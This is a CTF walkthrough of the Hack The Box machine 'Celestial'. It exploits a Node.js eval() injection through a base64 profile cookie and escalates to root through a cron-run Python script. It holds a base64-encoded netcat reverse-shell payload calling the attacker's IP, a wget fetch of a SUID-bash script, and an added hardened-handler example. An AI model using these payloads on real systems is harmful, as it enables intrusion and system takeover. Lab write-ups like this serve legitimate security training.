Port scanning

┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 11:40 CST
Nmap scan report for 10.10.10.85
Host is up (0.074s latency).
Not shown: 64359 closed tcp ports (reset), 1175 filtered tcp ports (no-response)
PORT STATE SERVICE
3000/tcp open ppp

Nmap done: 1 IP address (1 host up) scanned in 12.83 seconds
┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ sudo nmap -sT -sC -sV -O -p3000 10.10.10.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 11:41 CST
Nmap scan report for 10.10.10.85
Host is up (0.072s latency).

PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds

Web

The scan shows an Express application. Opening the page, it contains a single line: "Hey Dummy 2 + 2 is 22".

Directory brute-forcing turned up nothing else, but there is a cookie named profile. URL-decoding it and then base64-decoding the result gives:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

When I change "2" to "1", the page content becomes: Hey Dummy 1 + 1 is 11

At first I assumed Pug template injection, but injecting #{7*7} made the page throw an error, and entering an arbitrary non-numeric string changed the error to:

ReferenceError: awfawgwagawfawgwag is not defined
at eval (eval at <anonymous> (/home/sun/server.js:13:29), <anonymous>:1:1)
at /home/sun/server.js:13:16
at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
at next (/home/sun/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
at /home/sun/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)
at next (/home/sun/node_modules/express/lib/router/index.js:275:10)
at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)

The num value we supply is passed to eval, so we can build an RCE payload: a reverse shell, base64-encoded and then URL-encoded, along the lines of:

{"username":"hack","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"require('child_process').execSync('echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC43IDQ0MyA+L3RtcC9m | base64 -d | bash').toString();"}

Got a shell!
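As an added illustration (not the box's /home/sun/server.js, whose source is not on the page), the following is a hypothetical reconstruction of a cookie handler that reproduces the behaviour seen above ("2 + 2 is 22", a ReferenceError for a non-numeric num), placed next to a hardened handler that validates the field and never evaluates it. The cookie format (URL-encoded base64 JSON) and the use of eval are taken from the writeup; the exact expression built by the real server is an assumption.

```javascript
// Added example, not the target's own code. The vulnerable handler is a
// hypothetical reconstruction consistent with the writeup's observations.

// Cookie format as decoded in the writeup: URL-encoded base64 of a JSON object.
function decodeProfile(cookieValue) {
  const json = Buffer.from(decodeURIComponent(cookieValue), 'base64').toString('utf8');
  return JSON.parse(json);
}

// Inverse of decodeProfile, used to build test cookies.
function encodeProfile(profile) {
  return encodeURIComponent(Buffer.from(JSON.stringify(profile)).toString('base64'));
}

// Vulnerable reconstruction (assumption): concatenating the two strings and
// handing the result to eval explains both "22" (eval("2"+"2")) and the
// ReferenceError for a non-numeric value; it also means any JavaScript
// placed in "num" runs on the server.
function vulnerableHandler(cookieValue) {
  const p = decodeProfile(cookieValue);
  const result = eval(p.num + p.num); // eslint-disable-line no-eval
  return `Hey ${p.username} ${p.num} + ${p.num} is ${result}`;
}

// Hardened handler: reject anything that is not a bounded integer string,
// convert it to a number, and do the arithmetic in code, never in eval.
const NUM_RE = /^-?\d{1,9}$/;
const NAME_RE = /^[A-Za-z0-9_ ]{1,32}$/;

function safeHandler(cookieValue) {
  let p;
  try {
    p = decodeProfile(cookieValue); // bad URL-encoding, base64 or JSON ends up here
  } catch {
    return { status: 400, body: 'malformed profile cookie' };
  }
  if (typeof p !== 'object' || p === null ||
      typeof p.username !== 'string' || !NAME_RE.test(p.username) ||
      typeof p.num !== 'string' || !NUM_RE.test(p.num)) {
    return { status: 400, body: 'invalid profile fields' };
  }
  const n = Number(p.num);
  return { status: 200, body: `Hey ${p.username} ${n} + ${n} is ${n + n}` };
}
```

The same cookie that yields "22" from the vulnerable handler yields "4" from the hardened one, and the non-numeric string that produced the stack trace above is rejected with a 400 instead of reaching eval.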

Privilege escalation

Enumeration turned up nothing else, so I ran pspy; it needs to run for a few minutes before it shows anything useful:

2024/09/16 00:45:01 CMD: UID=0     PID=7405   | /bin/sh -c python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py

One idea was to write a `data` command and hijack it through the PATH environment variable:

┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ cat data
#!/bin/bash
cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash
sun@celestial:~/Documents$ wget http://10.10.14.7:8000/data
wget http://10.10.14.7:8000/data
--2024-09-16 01:01:35-- http://10.10.14.7:8000/data
Connecting to 10.10.14.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65 [application/octet-stream]
Saving to: 'data'

data 100%[===================>] 65 --.-KB/s in 0s

2024-09-16 01:01:35 (21.5 MB/s) - 'data' saved [65/65]

sun@celestial:~/Documents$ chmod +x data
chmod +x data
sun@celestial:~/Documents$ export PATH=/home/sun/Documents:$PATH
export PATH=/home/sun/Documents:$PATH

But that failed, so I tried modifying the script.py file instead and wrote a reverse shell into it. Success!

Closing thoughts

A fairly simple box; everything in it was something I had run into before, and the path through it was clear.